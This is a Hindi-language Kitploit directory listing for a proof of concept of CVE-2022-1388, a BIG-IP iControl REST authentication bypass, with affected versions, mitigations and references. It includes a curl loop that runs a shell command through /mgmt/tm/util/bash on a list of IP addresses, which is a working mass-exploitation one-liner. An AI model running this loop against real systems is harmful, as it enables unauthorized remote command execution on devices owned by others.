Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-1388 — BIG-IP iControl REST भेद्यता CVE-2022-1388 PoC | Kitploit
उपकरण/GitHubGitHub/shamo0/cve-2022-1388
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubshamo0/cve-2022-1388

CVE-2022-1388

BIG-IP iControl REST भेद्यता CVE-2022-1388 PoC

रिपॉजिटरी देखें
1684 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

BIG-IP iControl REST भेद्यता CVE-2022-1388 PoC

f5logo

यह भेद्यता एक अनधिकृत हमलावर को BIG-IP सिस्टम तक प्रबंधन पोर्ट और/या सेल्फ IP पतों के माध्यम से नेटवर्क पहुँच के साथ मनमानी सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने या हटाने, या सेवाओं को अक्षम करने की अनुमति दे सकती है।

PoC

आप F5 Big-IP भेद्यता की जाँच के लिए निम्नलिखित curl वन-लाइनर का उपयोग कर सकते हैं या दिए गए python स्क्रिप्ट का उपयोग कर सकते हैं।

cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

भेद्य संस्करण (Big-IP)

ब्रांचभेद्य संस्करणपेश किए गए फिक्स
11.x11.6.1-11.6.5No Fix
12.x12.1.0-12.1.6No Fix
13.x13.1.0-13.1.413.1.5
14.x14.1.0-14.1.414.1.4.6
15.x15.1.0-15.1.515.1.5.1
16.x16.1.0-16.1.216.1.2.2
17.xNone17.0.0

शमन

  • ```Fixes Introduced``` कॉलम में सुधारित संस्करण में अपग्रेड करें। (पसंदीदा तरीका)
  • सेल्फ IP पते के माध्यम से iControl REST एक्सेस को ब्लॉक करें
  • प्रबंधन इंटरफ़ेस के माध्यम से iControl REST एक्सेस को ब्लॉक करें
  • BIG-IP httpd कॉन्फ़िगरेशन को संशोधित करें

शमन के बारे में अधिक जानकारी के लिए संदर्भ देखें।

संदर्भ

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit
टूल डाउनलोड करें